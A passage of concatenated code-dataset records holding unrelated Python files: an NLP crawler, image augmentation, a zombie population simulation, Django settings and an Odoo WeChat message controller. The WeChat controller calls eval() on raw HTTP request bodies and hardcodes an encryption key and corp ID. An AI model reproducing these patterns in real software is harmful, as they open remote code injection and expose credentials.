= sf_input_text)\n\n # sf_io = StringIO(sf_r.text)\n # print(sf_io)\n # sf_output_text = json.load(sf_io)\n # print(sf_output_text)\n\n # stanFord = sf_output_text['token']\n # sf_Seg = []\n # postagger_input = []\n # for i in stanFord[0]:\n # sf_Seg.append(i)\n # print(sf_Seg)\n #-------------------StanFord End--------------------\n #-------------------Postagger Start-----------------\n pos_input_text = {\n 'name':Jieba_Seg,\n }\n # print(pos_input_text)\n pos_r = requests.post(url_postagger1, json = pos_input_text)\n\n pos_io = StringIO(pos_r.text)\n pos_output_text = json.load(pos_io)\n pos_result = list()\n\n for i in pos_output_text:\n for j in i:\n pos_result.append(j)\n\n 
# print(pos_output_text)\n print(pos_output_text)\n\n temp = {'sentence' : sentence, 'Jieba_Seg': Jieba_Seg, 'Postagger':pos_result}\n # print(temp)\n\n # append a dictionary in \"result_update\" list\n result_update.append(temp)\n\n # to print result\n print('Output:')\n print(result_update)\n\n # update target\n \n db.all_1109.update(\n { 'artUrl' : article_url },\n { '$set' : {\n 'result': result_update ,\n }\n }, upsert = True, multi=True\n )\n \n print(\"Update Sucessfully!\")\n\n\ndef main():\n\tpart2()\n\nif __name__==\"__main__\":\n main()","sub_path":"crawler_nlp.py","file_name":"crawler_nlp.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"298432648","text":"'''\nData Augmentation\n'''\n\nimport cv2 as cv\nimport numpy as np\nimport imgaug as ia\nimport imgaug.augmenters as iaa\n\n\nprint(ia.__version__)\n\ndef myDataAug(X_data, Y_data, its, seed=12):\n size = len(X_data)\n ia.seed(seed)\n\n seq = iaa.Sequential([\n iaa.GaussianBlur(sigma=(0.0, 4.0)), #Random GaussianBlur from sigma 0 to 4\n #iaa.AddToHueAndSaturation((-10, 10), per_channel=True), #color jittering\n iaa.Affine(translate_percent={\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}), #affine transalte (affects segmaps)\n iaa.Fliplr(0.5), #50 % to flip horizontally (affects segmaps)\n iaa.Flipud(0.5), #50 % to flip vertically (affects segmaps)\n iaa.Rotate((-45, 45)) # rotate by -45 to 45 degrees (affects segmaps)\n ], random_order=True)\n\n X_data_augs = np.zeros((its*size, 1000, 1000, 3), dtype=np.uint8)\n Y_data_augs = np.zeros((its*size, 1000, 1000, 3), dtype=np.uint8)\n\n for i in range(its):\n X_data_aug, Y_data_aug = seq(images=X_data, segmentation_maps=Y_data)\n X_data_augs[i*size: (i+1)*size] = X_data_aug\n Y_data_augs[i*size: (i+1)*size] = Y_data_aug\n\n return X_data_augs, Y_data_augs\n","sub_path":"libs/dataAug.py","file_name":"dataAug.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"228464515","text":"import os, sys\nfrom include.utils import load_config, dict2\nfrom include.common import home\n\ne=sys.exit\n\n\n\n\n\nclass Layout(object): \n\tdef __init__(self, layout_loc):\n\t\tglobal cfg\n\t\tself.layout_loc=layout_loc\n\t\tself.layout_fn=os.path.basename(layout_loc)\n\t\tself.layout_name = os.path.splitext(self.layout_fn)[0]\n\t\tself.cfg = cfg = load_config(config_path = layout_loc)\n\t\t\n\tdef get(self, key, default = None):\n\t\treturn cfg.get(key, default)\n\t\t\n\tdef items(self, pref=None):\n\t\tfor key, val in cfg.items():\n\t\t\tprint(key)\n\t\t\tyield (key, val)\n\n\n","sub_path":"include/Layout.py","file_name":"Layout.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"601770956","text":"from pylab import *\r\n\r\ninnvandring = 0.1\r\ndeath = 0.03\r\nmedisiner = 0.9 #medisiner sinker dødsraten med 10%\r\nt0 = 0\r\nstart_mennesker = 500\r\nstart_zombie = 100\r\nvekst = innvandring - death \r\nhyppigheten = 0.0004\r\nsjanse_død = 0.2 #0.2 fordi det er 20% sjanse på at et menneske dør når den møter på en zombie\r\nsjanse_smitta = 0.3 # 0.3 fordi man har 30% sjanser på at man blir smitta når man møter på en zombie\r\nsjanse_drap = 0.1 #sjanse for å drepe zombie \r\nantall_forsterkninger = 250\r\nbefolknings_grense = 1000 #Hvis befolkningen dropper under 1000 sa kommer forstarkninger\r\nantall = 0\r\ntrening = 
0.1\r\n\r\nN = 100000\r\ntid = 100\r\ndt = tid/(N-1)\r\n\r\nt = zeros(N)\r\nP = zeros(N)\r\nZ = zeros(N)\r\nPder = zeros(N)\r\nZder = zeros(N)\r\nD = zeros(N) # encounters between humans and zombies\r\nPu = zeros(N) # human population without zombies\r\nPuDer = zeros(N) \r\n# Dder = zeros(N)\r\n\r\ndef forsterkninger():\r\n    global sjanse_død\r\n    global sjanse_drap\r\n    global death\r\n    sjanse_død = sjanse_død * 0.5\r\n    sjanse_drap = sjanse_drap * 1.5\r\n    death = death * medisiner\r\n    vekst = innvandring - death \r\n    \r\nt[0] = t0\r\nP[0] = start_mennesker\r\nZ[0] = start_zombie\r\nD[0] = 0 # how many die because of zombies \r\nPu[0] = start_mennesker \r\n# Dder[0] = 0\r\nfor i in range (N-1):\r\n    Pder[i] = vekst * P[i] * (1-P[i]/20000) - (hyppigheten * P[i] * Z[i])*sjanse_død \r\n    Zder[i] = (D[i] * sjanse_smitta) - (D[i] * (sjanse_drap + trening))\r\n    PuDer[i] = vekst * P[i] * (1-P[i]/20000)\r\n    # Dder[i+1] = (D[i+1] - D[i]) / (t[i+1] - t[i])\r\n    D[i+1] = (Pu[i] + PuDer[i] * dt) - (P[i] + Pder[i] * dt)\r\n    Pu[i+1] = Pu[i] + PuDer[i] * dt \r\n    P[i+1] = P[i] + Pder[i] * dt\r\n    \r\n    if P[i+1] < P[i] and P[i] <= 1000 and antall < 2 : # reinforcements can arrive at most twice \r\n        P[i+1] = P[i] + antall_forsterkninger\r\n        forsterkninger()\r\n        antall += 1\r\n   \r\n    Z[i+1] = Z[i] + Zder[i]*dt \r\n    t[i+1] = t[i] + dt\r\n    \r\n    if Z[i] <= 0:\r\n        Z[i+1] = (Z[i] + Zder[i]*dt) * 0\r\n        \r\n    if death < 0.03:\r\n        medisiner = medisiner * 1.001\r\n    \r\n    \r\n# plots the population growth\r\nplot(t,P, label='Mennesker')\r\nplot(t,Z, label='Zombie') \r\ngrid()\r\nlegend()\r\ntitle(\"Populasjon\")\r\nxlabel(\"År\")\r\nylabel(\"Populasjon\")\r\nshow()\r\n\r\n# plots how many die because of zombies\r\nplot(t,D)\r\ngrid()\r\ntitle(\"Død pga. Zombie\")\r\nxlabel(\"År\")\r\nylabel(\"Populasjon\")\r\nshow()\r\n\r\n\r\n","sub_path":"zombie greia.py","file_name":"zombie greia.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"534884005","text":"# Django settings for whwn project.\nimport os\nimport sys\nimport json\n\ndef project(*args):\n    path = os.path.join(os.path.dirname(__file__), \"../\")\n    file_path = os.path.realpath(path)\n    return os.path.join(file_path, *args)\n\nADMINS = (\n    ('WeHave-WeNeed', 'admin@wehave-weneed.org'),\n)\n\n# Celery\nimport djcelery\ndjcelery.setup_loader()\n\nCELERY_QUEUES = {\n    'default': {\n        'exchange': 'default',\n        'exchange_type': 'topic',\n        'binding_key': 'tasks.#',\n    }\n}\nCELERY_DEFAULT_QUEUE = \"default\"\nCELERY_IMPORTS = (\"whwn.tasks\",)\n\nHAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'\n\n# Registration options\nACCOUNT_ACTIVATION_DAYS = 7\n\nMANAGERS = ADMINS\n\nDATETIME_FORMAT = \"U\"\n\nTIME_ZONE = 'America/Los_Angeles'\nLANGUAGE_CODE = 'en-us'\nUSE_I18N = True\nUSE_L10N = False\n\n# Custom WHWN Authentication Backend. Look at\n# whwn/auth_backends.py for more information.\nAUTHENTICATION_BACKENDS = (\n    'whwn.auth_backends.WHWNUserAuthBackend',\n)\n\n# URL that handles the media served from MEDIA_ROOT. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\nSTATIC_DOC_ROOT = 'home/site-directory/media/'\nADMIN_MEDIA_PREFIX = '/admin-media/'\n\nPIPELINE_COMPASS_ARGUMENTS = '-c %s' % project('static/config.rb')\nPIPELINE_COMPILERS = ('pipeline_compass.compass.CompassCompiler',)\nPIPELINE_CSS = {\n 'app': {\n 'source_filenames': (\n 'vendor/jqueryUI/css/smoothness/jquery-ui-1.10.0.custom.css',\n 'vendor/css/crumble.css',\n 'vendor/css/grumble.min.css',\n 'vendor/css/slideviewer.css',\n 'vendor/css/L.Control.Zoomslider.css',\n 'vendor/css/leaflet_numbered_markers.css',\n 'vendor/css/backgrid.css',\n 'vendor/css/backgrid-select2-cell.css',\n 'vendor/css/select2.css',\n 'sass/base.sass',\n ),\n 'output_filename': '.css/app.css',\n 'variant': 'datauri',\n },\n}\n\n# RequireJS options\nREQUIRE_BASE_URL = \"coffee/backbone\"\nREQUIRE_ENVIRONMENT = \"node\"\nREQUIRE_JS = \"components/requirejs/require.js\"\nREQUIRE_BUILD_PROFILE = \"../app.inventory.js\"\nREQUIRE_STANDALONE_MODULES = {\n \"main\": {\n \"out\": \"inventory-built.js\",\n \"build_profile\": \"../app.inventory.js\",\n }\n}\n\nSTATICFILES_DIRS = (\n project('static/'),\n project('tools/static/'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n # other finders..\n)\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# URL prefix for s3 hosted files.\n# To use, {{S3HOST}}foo.bar make sure there is no trailing slash after S3HOST\nS3HOST = 'https://s3.amazonaws.com/whwnhaiti/'\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n# Fixtures for initial data\nFIXTURES_DIR = (\n project(\"fixtures/\"),\n)\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n # 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.core.context_processors.debug',\n 'django.contrib.messages.context_processors.messages'\n)\n\nINTERNAL_IPS = ('127.0.0.1', '10.0.2.2')\nMESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n\n # Timeout Middleware is used to time out someones session after a specified period of time\n # 'middleware.timeoutmiddleware.TimeoutMiddleware',\n\n 'pipeline.middleware.MinifyHTMLMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware', \n)\n\nROOT_URLCONF = 'urls'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.gis',\n 'django.contrib.admin',\n 'django.contrib.staticfiles',\n 'django.contrib.messages',\n 'django_jenkins',\n 'haystack',\n 'adminplus',\n 'debug_toolbar',\n 'django_extensions',\n # in conjunction with 
django.contrib.staticfiles\n 'pipeline',\n 'whwn',\n 'whwn.templatetags',\n 'tools',\n 'registration',\n 'postmark',\n 'south',\n 'djcelery',\n 'tastypie',\n 'require',\n)\n\nDEBUG_TOOLBAR_PANELS = (\n 'debug_toolbar.panels.version.VersionDebugPanel',\n 'debug_toolbar.panels.timer.TimerDebugPanel',\n 'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',\n 'debug_toolbar.panels.headers.HeaderDebugPanel',\n 'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',\n 'debug_toolbar.panels.template.TemplateDebugPanel',\n 'debug_toolbar.panels.sql.SQLDebugPanel',\n 'debug_toolbar.panels.logger.LoggingPanel',\n)\n\ndef custom_show_toolbar(request):\n return True # Always show toolbar, for example purposes only.\n\nDEBUG_TOOLBAR_CONFIG = {\n 'INTERCEPT_REDIRECTS': False,\n 'SHOW_TOOLBAR_CALLBACK': None,\n 'EXTRA_SIGNALS': [],\n 'HIDE_DJANGO_SQL': False,\n 'SHOW_TEMPLATE_CONTEXT': True,\n 'TAG': 'body',\n}\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n project(\"templates/\"),\n project('tools/templates/'),\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django.request': {\n 'handlers': ['console'],\n 'level': 'ERROR',\n 'propagate': False,\n },\n # 'django.db.backends': {\n # 'level': 'DEBUG',\n # 'handlers': ['console'],\n # },\n }\n}\n\nTEST_RUNNER = 'whwn.testing.WhwnTestSuiteRunner'\n\nAUTH_PROFILE_MODULE = 'whwn.UserProfile'\n\nLOGIN_URL = '/accounts/login/'\n\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\n","sub_path":"app/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"551172177","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import http\nimport hashlib\nfrom lxml import etree\nfrom openerp.http import request\nfrom openerp.modules.registry import RegistryManager\nfrom openerp import SUPERUSER_ID\nimport time\nimport random\nimport datetime,json\nfrom openerp.addons.rhwl import rhwl_sale,rhwl_sms\nfrom .. 
import WXBizMsgCrypt\nfrom urllib import unquote\nimport logging\nimport re\nimport BCPTConvert,BCPT\n_logger = logging.getLogger(__name__)\n\nclass weixin(http.Controller):\n    CONTEXT={'lang': \"zh_CN\",'tz': \"Asia/Shanghai\"}\n    HOSTNAME=\"http://erp.genetalks.com\"\n\n    def xml2dict(self,xml):\n        data = dict([(x.tag,x.text) for x in xml.getchildren()])\n        return data\n\n    def checkSignature(self,signature,timestamp,nonce,token):\n        \"\"\"Check whether this request really comes from the official WeChat servers.\"\"\"\n        #token = 'vnsoft'\n        # sort lexicographically\n        list=[token,timestamp,nonce]\n        list.sort()\n        # SHA-1 digest\n        sha1=hashlib.sha1()\n        map(sha1.update,list)\n        hashcode=sha1.hexdigest()\n\n        # return True if the request comes from WeChat, otherwise False\n        return hashcode == signature\n\n    def msgProcess(self,msgdata,encrypt=False,kw=None):\n        \"\"\"Handle the content of the message interface.\"\"\"\n        # data POSTed by the official WeChat servers\n\n        if msgdata:\n            try:\n                xml = etree.fromstring(msgdata) # parse the XML\n                msgType=xml.find(\"MsgType\").text\n                # dispatch to a different handler depending on the message type\n                _logger.debug(\"msg type is:\"+msgType)\n                if msgType=='event':\n                    return self.eventProcess(xml,encrypt,kw)\n                elif msgType=='text':\n                    _logger.debug(\"call textProcess\")\n                    return self.textProcess(xml,encrypt,kw)\n            except:\n                return msgdata\n        return 'No Data Found'\n\n    def eventProcess(self,xmlstr,encrypt=False,kw=None):\n        xml_data = self.xml2dict(xmlstr)\n        msgType=xml_data.get(\"MsgType\")\n        fromUser=xml_data.get(\"FromUserName\")\n        toUser=xml_data.get(\"ToUserName\")\n        Event=xml_data.get(\"Event\") # get the event type\n        AgentID=xml_data.get(\"AgentID\",None)\n\n        if Event=='subscribe': # user subscribed\n            registry = RegistryManager.get(request.session.db)\n            with registry.cursor() as cr:\n                orig = registry.get(\"rhwl.weixin.base\")\n                welcome = orig.action_subscribe(cr,toUser,fromUser,AgentID)\n            return self.replyWeiXin(fromUser,toUser,welcome,encrypt,AgentID,kw)\n            #return self.replyWeiXin(fromUser,toUser,u\"欢迎关注【人和未来生物科技(北京)有限公司】,您可以通过输入送检编号查询检测进度和结果。\\n祝您生活愉快!\")\n        elif Event==\"CLICK\" or Event==\"click\":\n            key = xml_data.get(\"EventKey\")\n            registry = RegistryManager.get(request.session.db)\n            with registry.cursor() as cr:\n                orig = registry.get(\"rhwl.weixin.base\")\n                res=orig.action_event_clicked(cr,key,toUser,fromUser,AgentID)\n\n            if isinstance(res,(list,tuple)):\n                return self.send_photo_text(fromUser,toUser,res[0],res[1],encrypt,AgentID,kw)\n            else:\n                return self.replyWeiXin(fromUser,toUser,res,encrypt,AgentID,kw)\n        elif Event==\"unsubscribe\":\n            registry = RegistryManager.get(request.session.db)\n            with registry.cursor() as cr:\n                orig = registry.get(\"rhwl.weixin.base\")\n                orig.action_unsubscribe(cr,toUser,fromUser,AgentID)\n            return self.replyWeiXin(fromUser,toUser,u\"祝您生活愉快!\",encrypt,AgentID,kw)\n        else:\n            return \"\"\n\n    def textProcess(self,xmlstr,encrypt=False,kw=None):\n\n        msgType=xmlstr.find(\"MsgType\").text\n        fromUser=xmlstr.find(\"FromUserName\").text\n        toUser=xmlstr.find(\"ToUserName\").text\n        content=xmlstr.find(\"Content\").text # get the content the user entered\n        AgentID_el = [x for x in xmlstr.getchildren() if x.tag==\"AgentID\"]\n        if AgentID_el:\n            AgentID = AgentID_el[0].text\n        else:\n            AgentID=None\n\n        registry = RegistryManager.get(request.session.db)\n        _logger.debug((fromUser,toUser,content,AgentID))\n        if content==\"openid\":\n            return self.replyWeiXin(fromUser,toUser,fromUser,encrypt,AgentID,kw)\n        if content==\"buy\":\n            articles=[\n                {\n                    \"Title\":\"易感检测项目在线购买\",\n                    \"Description\":\"您可以选择以下易感检测项目支付\",\n                    \"PicUrl\":\"/rhwl_weixin/static/img/logo1.png\",\n                },\n                {\n                    \"Title\":\"肿瘤三项\",\n                    \"Description\":\"肿瘤三项易感基因检测\",\n                    \"PicUrl\":\"/rhwl_weixin/static/img/crm-2.jpg\",\n                
\"Url\":\"http://erp.genetalks.com/rhwl_weixin/static/buy/genes-3.html\"\n },\n ]\n return self.send_photo_text(fromUser,toUser,\"rhwc\",articles,encrypt,AgentID,kw)\n with registry.cursor() as cr:\n orig = registry.get(\"rhwl.weixin.base\")\n res = orig.action_text_input(cr,content,toUser,fromUser)\n _logger.debug((fromUser,toUser,res,encrypt,AgentID,kw))\n return self.replyWeiXin(fromUser,toUser,res,encrypt,AgentID,kw)\n\n\n def send_photo_text(self,toUser,fromUser,code,articles,encrypt=None,AgentID=None,kw=None):\n #发送图文消息\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n orig = registry.get(\"rhwl.weixin\")\n #ids = orig.search(cr,SUPERUSER_ID,[(\"openid\",\"=\",toUser),(\"base_id.code\",\"=\",code)])\n\n #if ids:\n # user_obj = orig.browse(cr,SUPERUSER_ID,ids[0]).rhwlid\n # user_obj = user_obj.encode(\"utf-8\")\n #else:\n user_obj=toUser\n articlesxml=\"\"\n for i in articles:\n itemxml=\"\"\n\n for k,v in i.items():\n\n if k==\"Url\" or k==\"PicUrl\":\n if not v.startswith(\"http\"): v = self.HOSTNAME+v\n if k=='Url':\n if v.count('?')>0:\n v = v+\"&code=\"+code+\"&openid=\"+user_obj\n else:\n v = v+\"?code=\"+code+\"&openid=\"+user_obj\n\n itemxml +=\"<%s>\" %(k,v,k)\n itemxml=\"%s\" % (itemxml,)\n articlesxml += itemxml\n\n temp = \"%s%s%s \"\n temp = temp % (toUser,fromUser,time.time().__trunc__().__str__(),str(articles.__len__()),articlesxml)\n if encrypt:\n sVerifyTimeStamp=kw.get('timestamp')\n sVerifyNonce=kw.get('nonce')\n sToken = kw.get('t')\n sEncodingAESKey = \"KWkAnyk5COAu3tiLlSvWCwHp8pHj7wGwjYvuNxLdyCR\"\n sCorpID = \"wx77bc43a51cdb049b\"\n wxcpt=WXBizMsgCrypt.WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)\n ret,sEncryptMsg=wxcpt.EncryptMsg(temp, sVerifyNonce, sVerifyTimeStamp)\n _logger.debug((ret,sEncryptMsg))\n if( ret!=0 ):\n return \"ERR: EncryptMsg ret: \" + ret\n return sEncryptMsg\n else:\n return temp\n\n def replyWeiXin(self,toUser,fromUser,text,encrypt=False,AgentID=None,kw=None):\n \"\"\"微信号统一回复方法\"\"\"\n #_logger.error((toUser,fromUser,text,encrypt,AgentID,kw))\n if not isinstance(text,(str,unicode)):\n _logger.debug(\"text is not str and unicode.\")\n _logger.debug(type(text))\n text = str(text)\n if AgentID:\n temp = \"%s\"+AgentID+\"\"\n temp = temp % (toUser,fromUser,time.time().__trunc__().__str__(),text.encode(\"utf-8\"))\n sVerifyTimeStamp=kw.get('timestamp')\n sVerifyNonce=kw.get('nonce')\n sToken = kw.get('t')\n sEncodingAESKey = \"KWkAnyk5COAu3tiLlSvWCwHp8pHj7wGwjYvuNxLdyCR\"\n sCorpID = \"wx77bc43a51cdb049b\"\n wxcpt=WXBizMsgCrypt.WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)\n ret,sEncryptMsg=wxcpt.EncryptMsg(temp, sVerifyNonce, sVerifyTimeStamp)\n #_logger.error((ret,sEncryptMsg))\n if( ret!=0 ):\n return \"ERR: EncryptMsg ret: \" + ret\n return sEncryptMsg\n else:\n temp = \"%s\"\n _logger.debug(temp % (toUser,fromUser,time.time().__trunc__().__str__(),text))\n return temp % (toUser,fromUser,time.time().__trunc__().__str__(),text)\n\n def customer_service(self,toUser,fromUser,encrypt=False):\n \"\"\"微信号统一回复方法\"\"\"\n temp = \"%s\"\n return temp % (toUser,fromUser,time.time().__trunc__().__str__())\n\n @http.route(\"/web/api/risk_tool/\",type=\"http\",auth=\"none\")\n def rhwl_risk_tool(self,**kw):\n bcpt = BCPT.RiskCalculator()\n bcpt_convert = BCPTConvert.BcptConvert()\n\n currentAge = bcpt_convert.GetCurrentAge((kw.get(\"current_age\")).encode(\"utf-8\"))\n menarcheAge = bcpt_convert.GetMenarcheAge(kw.get(\"age_at_menarche\").encode(\"utf-8\"))\n firstLiveBirthAge = 
bcpt_convert.GetFirstLiveBirthAge(kw.get(\"age_at_first_live_birth\").encode(\"utf-8\"))\n firstDegreeRel = bcpt_convert.GetFirstDegRelatives(kw.get(\"related_with_breast_cancer\").encode(\"utf-8\"))\n hadBiopsy = bcpt_convert.GetEverHadBiopsy(kw.get(\"ever_had_biopsy\").encode(\"utf-8\"))\n numBiopsy = bcpt_convert.GetNumberOfBiopsy(kw.get(\"previous_biopsies\").encode(\"utf-8\"))\n hyperPlasia = bcpt_convert.GetHyperPlasia(kw.get(\"biopsy_with_hyperplasia\").encode(\"utf-8\"))\n race = bcpt_convert.GetRace(kw.get(\"race\").encode(\"utf-8\"))\n\n CurrentAge = bcpt_convert.GetCurrentAge(currentAge)\n MenarcheAge = bcpt_convert.MenarcheAge(menarcheAge)\n FirstLiveBirthAge =bcpt_convert.FirstLiveBirthAge(firstLiveBirthAge)\n EverHadBiopsy = bcpt_convert.EverHadBiopsy(hadBiopsy)\n NumberOfBiopsy = bcpt_convert.NumberOfBiopsy(numBiopsy, EverHadBiopsy)\n ihyp = bcpt_convert.Hyperplasia(race, EverHadBiopsy);\n race = int(bcpt_convert.GetRace(race))\n if (race < 7):\n FirstDegRelatives = bcpt_convert.FirstDegRelatives1(firstDegreeRel)\n else:\n FirstDegRelatives = bcpt_convert.FirstDegRelatives2(firstDegreeRel, race)\n\n ProjectionAge = CurrentAge+5\n AgeIndicator = bcpt_convert.CurrentAgeIndicator(CurrentAge)\n rhyp = bcpt_convert.RHyperplasia(ihyp,EverHadBiopsy)\n irace = race\n\n abs_risk5 = bcpt.CalculateAbsoluteRisk(CurrentAge,ProjectionAge,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n avg_risk5 = bcpt.CalculateAeverageRisk(CurrentAge,ProjectionAge,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n abs_risk90 = bcpt.CalculateAbsoluteRisk(CurrentAge,90,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n avg_risk90 = bcpt.CalculateAeverageRisk(CurrentAge,90,AgeIndicator,NumberOfBiopsy,MenarcheAge,FirstLiveBirthAge,FirstDegRelatives,EverHadBiopsy,ihyp,rhyp,irace)\n abs_risk5 = round(round(abs_risk5,6)*100,1)\n avg_risk5 = round(round(avg_risk5,6)*100,1)\n abs_risk90 = round(round(abs_risk90,6)*100,1)\n avg_risk90 = round(round(avg_risk90,6)*100,1)\n response = request.make_response(json.dumps([abs_risk5,avg_risk5,abs_risk90,avg_risk90],ensure_ascii=False), [('Content-Type', 'application/json')])\n return response.make_conditional(request.httprequest)\n\n @http.route(\"/web/weixin/\",type=\"http\",auth=\"none\")\n def rhwl_weixin(self,**kw):\n if kw.get('signature') and kw.get('timestamp') and kw.get('nonce'):#微信官网是否有转入验证信息\n if self.checkSignature(kw.get('signature'),kw.get('timestamp'),kw.get('nonce'),kw.get('t')):\n if kw.get('echostr'):#验证通过则返回传入的echostr\n return kw.get('echostr')\n else:\n return 'Signature Error.'\n elif kw.get('msg_signature') and kw.get('timestamp') and kw.get('nonce'):\n #加密消息判断\n sToken = kw.get('t')\n sEncodingAESKey = \"KWkAnyk5COAu3tiLlSvWCwHp8pHj7wGwjYvuNxLdyCR\"\n sCorpID = \"wx77bc43a51cdb049b\"\n wxcpt=WXBizMsgCrypt.WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)\n sVerifyMsgSig=kw.get('msg_signature')\n sVerifyTimeStamp=kw.get('timestamp')\n sVerifyNonce=kw.get('nonce')\n sVerifyEchoStr=kw.get('echostr')\n if sVerifyEchoStr:\n ret,sEchoStr=wxcpt.VerifyURL(sVerifyMsgSig, sVerifyTimeStamp,sVerifyNonce,unquote(sVerifyEchoStr))\n if(ret!=0):\n return \"ERR: VerifyURL ret: \" + ret\n else:\n return sEchoStr\n else:\n sReqData = request.httprequest.data\n ret,sMsg=wxcpt.DecryptMsg( sReqData, sVerifyMsgSig, sVerifyTimeStamp, sVerifyNonce)\n _logger.debug((ret,sMsg))\n if( ret!=0 ):\n return 
\"ERR: DecryptMsg ret: \" + ret\n else:\n return self.msgProcess(sMsg,True,kw)\n return self.msgProcess(request.httprequest.data,False,kw)\n\n @http.route(\"/web/weixin/bind/\",type=\"http\",auth=\"public\")\n def rhwl_weixin_bind(self,**kw):\n para={}\n if request.httprequest.data:\n para = eval(request.httprequest.data)\n if kw:\n para.update(kw)\n if para.get(\"openid\") and para.get(\"uid\"):\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n obj = registry.get(\"rhwl.weixin\")\n obj.action_user_bind(cr,para.get(\"code\"),para.get(\"openid\"),para.get(\"uid\"))\n response = request.make_response(json.dumps({\"statu\":200},ensure_ascii=False), [('Content-Type', 'application/json')])\n else:\n response = request.make_response(json.dumps({\"statu\":500},ensure_ascii=False), [('Content-Type', 'application/json')])\n return response.make_conditional(request.httprequest)\n\n @http.route(\"/web/weixin/jsapi/\",type=\"http\",auth=\"public\")\n def rhwl_weixin_jsapi(self,**kw):\n para={}\n if request.httprequest.data:\n para = eval(request.httprequest.data)\n if kw:\n para.update(kw)\n url=para.get(\"url\",\"\").encode('utf-8')\n code=para.get(\"code\",\"\").encode('utf-8')\n s='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'\n noncestr=''.join([s[random.randrange(0,s.__len__()-1)] for i in range(1,21)])\n timestamp=time.time().__trunc__().__str__()\n\n registry = RegistryManager.get(request.session.db)\n with registry.cursor() as cr:\n b = registry.get('rhwl.weixin.base')\n ids =b.search(cr,SUPERUSER_ID,[(\"code\",\"=\",code)],limit=1)\n appid = b.browse(cr,SUPERUSER_ID,ids).original_id\n jsapi_ticket= b._get_ticket(cr,SUPERUSER_ID,code,context=self.CONTEXT)\n str = \"jsapi_ticket=\"+jsapi_ticket+\"&noncestr=\"+noncestr+\"×tamp=\"+timestamp+\"&url=\"+url\n sha = hashlib.sha1(str)\n s = sha.hexdigest()\n data={\n \"noncestr\":noncestr,\n \"timestamp\":timestamp,\n \"signature\":s,\n \"appid\":appid\n }\n response = request.make_response(json.dumps(data,ensure_ascii=False), [('Content-Type', 'application/json')])\n return response.make_conditional(request.httprequest)","sub_path":"data/odoo/8.0/rhwl_weixin/controllers/weixin.py","file_name":"weixin.py","file_ext":"py","file_size_in_byte":16589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"596575884","text":"# encoding: utf-8\n# from https://github.com/playone/forpython/blob/master/Newbie/test5.py\n\"\"\"\n字串可用 \" 或者 ' 